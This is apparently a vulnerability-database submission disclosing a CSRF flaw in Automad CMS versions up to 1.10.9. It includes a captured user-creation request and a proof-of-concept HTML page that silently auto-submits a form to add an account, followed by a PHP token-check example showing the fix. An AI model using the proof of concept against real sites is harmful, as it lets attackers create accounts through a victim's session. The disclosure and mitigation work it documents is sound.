Submission #249818: Automad CMS <= 1.10.9 Multiple Cross-Site Request Forgery (CSRF) Info

Title: Automad CMS <= 1.10.9 Multiple Cross-Site Request Forgery (CSRF)

Description: After observation, it was discovered that the application does not implement CSRF tokens by default, making it vulnerable to CSRF attacks. This impacts the overall functionality of the application. Below is a view of one of the action requests while adding a user:

    POST /dashboard?controller=UserCollection::createUser HTTP/1.1
    Host: automad.scr
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 76
    Origin: http://automad.scr
    Connection: close
    Referer: http://automad.scr/dashboard?view=System
    Cookie: Automad-8d86b702d2bd8d7c568d8600480adaef=feu6beoo6sc7ha2gp2gilsk211
    X-PwnFox-Color: green

    username=User&email=User%40example.com&password1=Passw0rd&password2=Passw0rd

CSRF HTML:

    <html>
      <body>
        <form action="http://automad.scr/dashboard?controller=UserCollection::createUser" method="POST">
          <input type="hidden" name="username" value="User" />
          <input type="hidden" name="email" value="User&#64;example&#46;com" />
          <input type="hidden" name="password1" value="Passw0rd" />
          <input type="hidden" name="password2" value="Passw0rd" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>
Source: https://github.com/screetsec/VDD/tree/main/Automad%20CMS/Cross-Site%20Request%20Forgery%20(CSRF)

User: Maland (UID 59886)

Submitted: 2023-12-09 06:15 PM (3 years ago)

Moderation: 2023-12-21 09:19 AM (12 days later)

Status: Accepted

VulDB Entry: 248687 [Automad up to 1.10.9 User Creation dashboard?controller=UserCollection::createUser cross site request forgery]

Points: 20
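The missing control is a synchronizer token: a per-session secret embedded in every dashboard form and verified, with a constant-time compare, before a state-changing controller such as the user-creation one runs. The following is an added example of that pattern, not Automad's own code; the function names, the field name csrf_token and the origin http://automad.scr are assumptions for illustration.

```php
<?php
// Synchronizer-token CSRF guard for a state-changing form handler.
// Added example, not Automad's code: names and the own-origin value are hypothetical.
declare(strict_types=1);

const CSRF_SESSION_KEY = '_csrf_token';
const CSRF_FIELD = 'csrf_token';

// Issue (or reuse) a per-session token: 32 random bytes, hex-encoded.
function csrfToken(): string {
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION[CSRF_SESSION_KEY])) {
        $_SESSION[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $_SESSION[CSRF_SESSION_KEY];
}

// Hidden field to render in every dashboard form; the PoC form above carries none,
// so a forged cross-site POST cannot know the value and fails the check.
function csrfField(): string {
    return '<input type="hidden" name="' . CSRF_FIELD . '" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

// Accept a POST only if the submitted token equals the session token
// (hash_equals avoids timing leaks) and the Origin header, when the
// browser sends one, names our own site rather than a third-party page.
function csrfValid(array $post, array $server, string $ownOrigin): bool {
    $sent = (string) ($post[CSRF_FIELD] ?? '');
    if ($sent === '' || !hash_equals(csrfToken(), $sent)) {
        return false;
    }
    if (isset($server['HTTP_ORIGIN']) && $server['HTTP_ORIGIN'] !== $ownOrigin) {
        return false;
    }
    return true;
}

// Guard placed at the top of the createUser controller: reject before any
// user record is created.
if ($_SERVER['REQUEST_METHOD'] === 'POST'
    && !csrfValid($_POST, $_SERVER, 'http://automad.scr')) {
    http_response_code(403);
    header('Content-Type: application/json');
    echo json_encode(['error' => 'Invalid or missing CSRF token']);
    exit;
}
// ... continue with the existing user-creation logic using $_POST['username'], $_POST['email'], etc.
```

Setting the session cookie with SameSite=Lax or Strict adds a second, browser-enforced layer, but the token check is what makes each individual request verifiable server-side.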
